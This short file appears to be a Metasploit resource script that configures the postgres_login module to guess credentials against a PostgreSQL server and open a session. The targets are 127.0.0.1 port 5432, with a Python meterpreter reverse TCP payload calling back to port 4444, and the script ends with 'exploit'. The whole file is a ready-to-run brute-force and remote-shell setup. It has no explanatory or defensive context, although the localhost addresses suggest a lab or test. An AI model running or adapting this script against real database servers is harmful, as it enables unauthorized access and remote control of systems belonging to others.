use auxiliary/scanner/postgres/postgres_login
set ANONYMOUS_LOGIN true
set BLANK_PASSWORDS false
set BRUTEFORCE_SPEED 5
set CreateSession true
set DATABASE template1
set DB_ALL_CREDS false
set DB_ALL_PASS false
set DB_ALL_USERS false
set DB_SKIP_EXISTING none
set PASSWORD password
set RETURN_ROWSET true
set RHOSTS 127.0.0.1
set RPORT 5432
set STOP_ON_SUCCESS true
set THREADS 1
set USER_AS_PASS false
set VERBOSE true
set PAYLOAD payload/python/meterpreter_reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit
